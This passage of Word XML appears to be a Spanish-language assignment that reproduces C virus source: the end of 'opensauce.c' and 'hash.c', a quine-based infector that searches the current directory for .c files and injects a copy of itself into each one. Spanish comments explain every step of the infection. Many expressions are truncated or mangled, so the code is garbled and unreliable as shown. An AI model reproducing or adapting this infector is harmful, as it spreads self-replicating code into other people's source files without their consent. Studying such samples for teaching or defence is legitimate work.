      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">               /* just 1 infection each time */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">                exit(0);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">                close(fd);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">             }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">           }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">       }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">       //cierra el archivo </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">      close(fd);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">    //cierra el flujo de directorio que abrimos con opendir</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">  closedir(dd);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">  /* sauce! */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t>&lt;----------------------&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t>&lt;--end of-opensauce.c--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t>&lt;----------------------&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A"/>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Segundo virus en c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t>&lt;---------------&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t>&lt;-----hash.c----&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t>&lt;---------------&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A"/>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t>/*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve"> * Hash,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve"> *</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve"> * quine-based source code infector.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve"> *                   zert &lt;zert@int80h.net&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve"> *</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve"> */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A"/>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t>#include &lt;stdio.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t>#include &lt;sys/stat.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t>#include &lt;sys/mman.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t>#include &lt;unistd.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t>#include &lt;dirent.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>#include &lt;fcntl.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="00605C18" w:rsidP="0055374A">
      <w:r>
        <w:t>//declaración de funcion</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t>void init_hash();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t>//funcion main donde se empezara a ejecutar el programa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t>int main(int argc, char *argv[])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:tab/>
        <w:t>//funcion que se ejecutara al inicio del programa o ejecutarlo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:tab/>
        <w:t>init_hash();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A"/>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t>//funcion hash permite insertar elementos a un array</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t>void init_hash()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:tab/>
        <w:t>// //estructuras y variables que controlas el directorio y sus ficheros:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:tab/>
        <w:t>//variables de tipo entero</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">int i, j, fd, size, mpos, ipos, page,ihole, thole, bhole, ehole; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:tab/>
        <w:t>//definimos una estructura</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">struct dirent *dir; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">  //variable de tipo DIR para abrir fichero </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:tab/>
        <w:t>DIR *d;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:tab/>
        <w:t>void *ptr;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">//array de tipo </w:t>
      </w:r>
      <w:r w:rsidR="00A2616A">
        <w:t>char</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> que almacenan string</w:t>
      </w:r>
      <w:r w:rsidR="00A2616A">
        <w:t xml:space="preserve"> (texto plano)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  que incluyen bibliotecas de lenguaje c y partes de codigo para realizar la infeccion</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:tab/>
        <w:t>char hashinc[] = "\n#include &lt;stdio.h&gt;\n#include &lt;sys/stat.h&gt;\n#include &lt;sys/mman.h&gt;\n#include &lt;unistd.h&gt;\n#include &lt;dirent.h&gt;\n#include &lt;fcntl.h&gt;\n\nvoid init_hash();\n";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:tab/>
        <w:t>char hashbeg[] = "\nvoid init_hash()\n{\n\tint i, j, fd, size, mpos, ipos, page, \n\tihole, thole, bhole, ehole; struct dirent *dir; DIR *d;\n\tvoid *ptr;\n\tchar hashinc[] = \"";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">char hashend[] = "\tchar *buf;\n\n\td = opendir(\".\");\n\twhile&gt;0)\n\t\tif(!(strcmp(dir-&gt;d_name+strlen(dir-&gt;d_name)-2,\".c\"))||\n\t\t   !(strcmp(dir-&gt;d_name+strlen(dir-&gt;d_name)-2,\".C\"))) \n\t\t\tif&gt;=0)\n\t\t\t{\n\t\t\t\tsize = lseek(fd, 0, SEEK_END);\n\t\t\t\tptr = mmap(NULL,size,PROT_READ,MAP_PRIVATE,fd,0);\n\t\t\t\tif( (!strstr(ptr,\"init_hash\")) &amp;&amp;\n\t\t\t\t  ( &gt;0) ||\n\t\t\t\t    &gt;0) ||\n\t\t\t\t    &gt;0) || \n\t\t\t\t    &gt;0) ||\n\t\t\t\t    &gt;0) ||\n\t\t\t\t    &gt;0) ) )\n\t\t\t\t{\n\t\t\t\t\tmpos = (int)strstr )\n\t\t\t\t\t{\n\t\t\t\t\t\tmunmap(ptr, size);\n\t\t\t\t\t\tbreak;\n\t\t\t\t\t}\n\t\t\t\t\tmunmap(ptr, size);\n\t\t\t\t\tpage = 3 * (int)sysconf(_SC_PAGESIZE);\n\t\t\t\t\tftruncate(fd, size+page);\n\t\t\t\t\tptr = mmap(NULL,size+page,PROT_READ+PROT_WRITE,MAP_SHARED,fd,0);\n\t\t\t\t\tipos = (int)strstr(ptr, \"#include &lt;\");\n\t\t\t\t\tipos = (int)strstr;\n\t\t\t\t\tstrcpy(buf,\"\\n\\tinit_hash();\");\n\t\t\t\t\tthole = strlen(buf);\n\t\t\t\t\tfor(i=(size+ihole-mpos)/thole;i&gt;=0;i--) \n\t\t\t\t\t\tmemcpy(ptr+mpos+i*thole+thole, ptr+mpos+i*thole, thole);\n\t\t\t\t\tmemcpy(ptr+mpos, buf, thole);\n\t\t\t\t\tbhole = strlen(hashbeg);\n\t\t\t\t\tmemcpy(ptr+size+ihole+thole, hashbeg, bhole);\n\t\t\t\t\tbuf = (char *)malloc(100*sizeof(char)+strlen(hashinc));\n\t\t\t\t\tfor(i=0,j=0;i&lt;strlen(hashinc);i,j)\n\t\t\t\t\t\tswitch(hashinc[i])\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\tcase '\\n':\n\t\t\t\t\t\t\t\tsprintf(buf+j, \"\\\\n\");\n\t\t\t\t\t\t\t\tj;\n\t\t\t\t\t\t\t\tbreak;\n\t\t\t\t\t\t\tcase '\\t':\n\t\t\t\t\t\t\t\tsprintf(buf+j, \"\\\\t\");\n\t\t\t\t\t\t\t\tj;\n\t\t\t\t\t\t\t\tbreak;\n\t\t\t\t\t\t\tcase '\\\\':\n\t\t\t\t\t\t\t\tsprintf(buf+j, \"\\\\\\\\\");\n\t\t\t\t\t\t\t\tj;\n\t\t\t\t\t\t\t\tbreak;\n\t\t\t\t\t\t\tcase '\\\"':\n\t\t\t\t\t\t\t\tsprintf(buf+j, \"\\\\\\\"\");\n\t\t\t\t\t\t\t\tj;\n\t\t\t\t\t\t\t\tbreak;\n\t\t\t\t\t\t\tdefault:\n\t\t\t\t\t\t\t\tsprintf(buf+j, \"%c\", hashinc[i]);\n\t\t\t\t\t\t} \n\t\t\t\t\tmemcpy(ptr+size+ihole+thole+bhole, buf, strlen(buf));\n\t\t\t\t\tbhole += strlen(buf);\n\t\t\t\t\tsprintf(ptr+size+ihole+thole+bhole, \"\\\";\\n\\tchar hashbeg[] =\\\"\");\n\t\t\t\t\tbhole += 21;\n\t\t\t\t\tbuf = (char *)malloc(100*sizeof(char)+strlen(hashbeg));\n\t\t\t\t\tfor(i=0,j=0;i&lt;strlen(hashbeg);i,j)\n\t\t\t\t\t\tswitch(hashbeg[i])\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\tcase '\\n':\n\t\t\t\t\t\t\t\tsprintf(buf+j, \"\\\\n\");\n\t\t\t\t\t\t\t\tj;\n\t\t\t\t\t\t\t\tbreak;\n\t\t\t\t\t\t\tcase '\\t':\n\t\t\t\t\t\t\t\tsprintf(buf+j, \"\\\\t\");\n\t\t\t\t\t\t\t\tj;\n\t\t\t\t\t\t\t\tbreak;\n\t\t\t\t\t\t\tcase '\\\\':\n\t\t\t\t\t\t\t\tsprintf(buf+j, \"\\\\\\\\\");\n\t\t\t\t\t\t\t\tj;\n\t\t\t\t\t\t\t\tbreak;\n\t\t\t\t\t\t\tcase '\\\"':\n\t\t\t\t\t\t\t\tsprintf(buf+j, \"\\\\\\\"\");\n\t\t\t\t\t\t\t\tj;\n\t\t\t\t\t\t\t\tbreak;\n\t\t\t\t\t\t\tdefault:\n\t\t\t\t\t\t\t\tsprintf(buf+j, \"%c\", hashbeg[i]);\n\t\t\t\t\t\t} \n\t\t\t\t\tmemcpy(ptr+size+ihole+thole+bhole, buf, strlen(buf));\n\t\t\t\t\tbhole += strlen(buf);\n\t\t\t\t\tsprintf(ptr+size+ihole+thole+bhole, \"\\\";\\n\\tchar hashend[] =\\\"\");\n\t\t\t\t\tbhole += 21;\n\t\t\t\t\tbuf = (char *)malloc(100*sizeof(char)+strlen(hashend));\n\t\t\t\t\tfor(i=0,j=0;i&lt;strlen(hashend);i,j)\n\t\t\t\t\t\tswitch(hashend[i])\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\tcase '\\n':\n\t\t\t\t\t\t\t\tsprintf(buf+j, \"\\\\n\");\n\t\t\t\t\t\t\t\tj;\n\t\t\t\t\t\t\t\tbreak;\n\t\t\t\t\t\t\tcase '\\t':\n\t\t\t\t\t\t\t\tsprintf(buf+j, </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>\"\\\\t\");\n\t\t\t\t\t\t\t\tj;\n\t\t\t\t\t\t\t\tbreak;\n\t\t\t\t\t\t\tcase '\\\\':\n\t\t\t\t\t\t\t\tsprintf(buf+j, \"\\\\\\\\\");\n\t\t\t\t\t\t\t\tj;\n\t\t\t\t\t\t\t\tbreak;\n\t\t\t\t\t\t\tcase '\\\"':\n\t\t\t\t\t\t\t\tsprintf(buf+j, \"\\\\\\\"\");\n\t\t\t\t\t\t\t\tj;\n\t\t\t\t\t\t\t\tbreak;\n\t\t\t\t\t\t\tdefault:\n\t\t\t\t\t\t\t\tsprintf(buf+j, \"%c\", hashend[i]);\n\t\t\t\t\t\t} \n\t\t\t\t\tmemcpy(ptr+size+ihole+thole+bhole, buf, strlen(buf));\n\t\t\t\t\tbhole += strlen(buf);\n\t\t\t\t\tsprintf(ptr+size+ihole+thole+bhole, \"\\\";\\n\");\n\t\t\t\t\tbhole += 3;\n\n\t\t\t\t\tehole = strlen(hashend);\n\t\t\t\t\tmemcpy(ptr+size+ihole+thole+bhole, hashend, ehole);\n\t\t\t\t\tmsync(ptr, size+page, MS_SYNC);\n\t\t\t\t\tmunmap(ptr, size+page);\n\t\t\t\t\tftruncate(fd, size+ihole+thole+bhole+ehole);\n\t\t\t\t} else\n\t\t\t\t{\n\t\t\t\t\tmunmap(ptr, size);\n\t\t\t\t}\n\t\t\t}\n}\n";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:tab/>
        <w:t>char *buf;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:tab/>
        <w:t>//almacenamos en la variable d de tipo DIR el fichero que queremos abrir y el puntero se posicionara en la primera entrada al directorio</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:tab/>
        <w:t>d = opendir(".");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:tab/>
        <w:t>//si es mayor a 0 es que se encuentra un archivo ya que si no daria un numero negativo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:tab/>
        <w:t>while dd&gt;0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>//evaluamos con un if si la funcion strmcp retorna un numero entero mayor menor o igual que cero  es decir compara cadena de caracteres hasta llegar al caracter situado</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">        //en la ultima posicion si las cadenas son iguales devuelve 0 si es mayor un numero positivo, menor numero negativo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">        //la funcion  strlen calcula el numero de caracteres de la cadena apuntada y comprobamos que sea un fichero .c  o  .C</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>if(!(strcmp(dir-&gt;d_name+strlen(dir-&gt;d_name)-2,".c")) ||  !(strcmp(dir-&gt;d_name+strlen(dir-&gt;d_name)-2,".C")))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>if&gt;=0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">    //proceso de infeccion</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">//almacenamos en la variable size de tipo entero la posicion donde queremos posicionarnos en el fichero con la constante SEEK_END se refiere a posicionar </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">//el puntero al final del fichero </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>size = lseek(fd, 0, SEEK_END);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>//almacenamos en la variable ptr de tipo void(no devuelve nada) lo que devuelve la funcion mmap que es ubicar la longitud de bytes comnezando donde</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>//queremos posicionarnos desde el fichero el primer parametro es nulo la variable size es la posicion donde queremos ubicarnos en el fichero, PROT_READ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>//es la constante que indica que las paginas deben ser leidas , la otra constantes MAP_PRIVATE Crear un área privada copy-on-write(copiar o escribir).  Almacenar en la  región  no  afecta  al</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:t xml:space="preserve">                // fichero original.Es indefinido si los cambios hechos al fichero despues de la llamada a mmap son visibles en la region mapeada.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>ptr = mmap(NULL,size,PROT_READ,MAP_PRIVATE,fd,0);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>// Localiza la primera aparición en la cadena apuntada en otrs palabra busca una subcadea dentro de una cadena. el primer parametro es la cadena a analizar el segundo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>//parametro es la subcadena a buscar devolvera null si no se encuentra esa cadena representada en comillas</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>if( (!strstr(ptr,"init_hash")) &amp;&amp; ( &gt;0) ||  &gt;0) ||&gt;0) ||&gt;0) ||&gt;0) ||&gt;0) ) )</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>{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//se almacena en la variable mpos de tipo entero  haceindo un casting pasandolo a entero, lo que devulve la funcion strstr que busca en la cadena mpos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//que se pasa a void y si dentro de esata se encuntra la cadena representada en comillas que es ",\n"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//la funcion mmap que devuelve un puntero al area reservada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mpos = (int)strstr((void *)mpos, ";\n");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//almacenamos en la variable mpos de tipo void  la resta de ptr que se encuentra almacenado lo que devulve la funcion mmap que devuelve un puntero al area reservada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mpos -= (int)--ptr;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 xml:space="preserve">//si se cumple la condicion entrara en el condicional si en ptr se encuntra la biblioteca include y el signo invierte se refiere a que si es distinto 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if( !(ipos = (int)strstr(++ptr, "#include &lt;")) )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{</w:t>
      </w:r>
      <w:r>
        <w:tab/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//borra las ubicaciones</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374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munmap(ptr, size);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  <w:t>//pausa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}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 xml:space="preserve">//borra las ubicaciones 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munmap(ptr, size);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//sysconf()  proporciona  una  forma  de  que  la  aplicacion determine ciertos valores para limites del sistema u opciones, en tiempo de ejecucion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//lo que recibe por parametro una constante que signfica el tamaño de la pagina en bytes y se multiplica por tres y se almacena en la variable page de tipo int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page = 3 * (int)sysconf(_SC_PAGESIZE);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 xml:space="preserve">//La función ftruncate () hace que el archivo normal al que hacen referencia los fildes tenga un tamaño de bytes de longitud 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//por parametro recibe el archibo que teneos abierto mas la suma de size que es la posicion del puntero en el archivo y page que es el tamaño de la pagina en bytes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ftruncate(fd, size+page);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//se almacena en ptr lo que devulve la funcion mmap que es un puntero al area reservada que especificamos con los parametros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ptr = mmap(NULL,size+page,PROT_READ+PROT_WRITE,MAP_SHARED,fd,0);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//se almacena si se encuentra con la funcion strstr la cadena include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ipos = (int)strstr(ptr, "#include &lt;");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//si se encuentra \n\n se almacenara en ipos en caso contrario devolvera null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ipos = (int)strstr((void *)ipos, "\n\n");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ipos -= (int)ptr;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//se almacena en ihole el calcuo de la cantidad de caracteres a la cadena apuntada que se expresa por parametros a esta funcion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ihole = strlen(hashinc);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055374A" w:rsidRDefault="0055374A" w:rsidP="0055374A">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
